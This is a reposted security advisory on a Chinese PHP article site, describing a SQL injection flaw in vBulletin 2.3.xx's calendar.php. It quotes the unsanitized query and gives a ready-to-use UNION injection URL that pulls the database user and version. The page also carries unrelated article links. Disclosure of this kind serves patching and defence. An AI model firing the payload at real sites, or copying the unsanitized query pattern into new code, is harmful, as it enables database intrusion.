编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

别人整理的服务器变量：$_SERVER

Oct 20 PHP

rephactor 优秀的PHP的重构工具

Jun 09 PHP

PHP Class&Object -- PHP 自排序二叉树的深入解析

Jun 25 PHP

Thinkphp调用Image类生成缩略图的方法

Mar 07 PHP

Yii实现自动加载类地图的方法

Apr 01 PHP

WordPress中获取所使用的模板的页面ID的简单方法

Dec 31 PHP

PHP文件操作之获取目录下文件与计算相对路径的方法

Jan 08 PHP

PHP处理数组和XML之间的互相转换

Jun 02 PHP

PHP实现QQ快速登录的方法

Sep 28 PHP

ThinkPHP实现图片上传操作的方法详解

May 08 PHP

php学习笔记之字符串常见操作总结

Jul 16 PHP

Laravel5.1 框架Middleware中间件基本用法实例分析

Jan 04 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

使用TinyButStrong模板引擎来做WEB开发

2007/03/16 PHP

php中全局变量global的使用演示代码

2011/05/18 PHP

phpcms模块开发之swfupload的使用介绍

2013/04/28 PHP

深入浅出php socket编程

2015/05/13 PHP

给WordPress中的留言加上楼层号的PHP代码实例

2015/12/14 PHP

PHP实现Unicode编码相互转换的方法示例

2020/11/17 PHP

PHP实现合并两个排序链表的方法

2018/01/19 PHP

javaScript - 如何引入js代码

2021/03/09 Javascript

js 静态动态成员 and 信息的封装和隐藏

2011/05/29 Javascript

javascript 日期时间转换的方法

2013/02/21 Javascript

Javascript实现关联数据(Linked Data)查询及注意细节

2013/02/22 Javascript

jquery选择器之属性过滤选择器详解

2014/01/27 Javascript

在NodeJS中启用ECMAScript 6小结（windos以及Linux）

2014/07/15 NodeJs

60个很实用的jQuery代码开发技巧收集

2014/12/15 Javascript

javascript中Math.random()使用详解

2015/04/15 Javascript

javascript实现对表格元素进行排序操作

2015/11/18 Javascript

JavaScript实现自动生成网页元素功能（按钮、文本等）

2015/11/21 Javascript

详解AngularJS中ng-src指令的使用

2016/09/07 Javascript

浅谈Angular路由复用策略

2017/10/04 Javascript

Vue基于vuex、axios拦截器实现loading效果及axios的安装配置

2019/04/26 Javascript

vue cli 3.0 搭建项目的图文教程

2019/05/17 Javascript

jquery实现烟花效果(面向对象)

2020/03/10 jQuery

JavaScript如何实现图片处理与合成

2020/05/29 Javascript

python实现系统状态监测和故障转移实例方法

2013/11/18 Python

python3使用SMTP发送HTML格式邮件

2018/06/19 Python

python使用paramiko模块通过ssh2协议对交换机进行配置的方法

2019/07/25 Python

Python 实现图片转字符画的示例(静态图片,gif皆可)

2020/11/05 Python

scrapy在python爬虫中搭建出错的解决方法

2020/11/22 Python

英国航空官网：British Airways

2016/09/11 全球购物

中专生自我鉴定书范文

2013/12/28 职场文书

《中国的气候》教学反思

2014/02/23 职场文书

法制宣传口号

2014/06/16 职场文书

学雷锋志愿者活动总结

2014/06/27 职场文书

群众路线领导班子四风对照检查材料

2014/09/27 职场文书

学校领导班子成员查摆问题及整改措施

2014/10/28 职场文书

2019财务毕业实习报告

2019/06/27 职场文书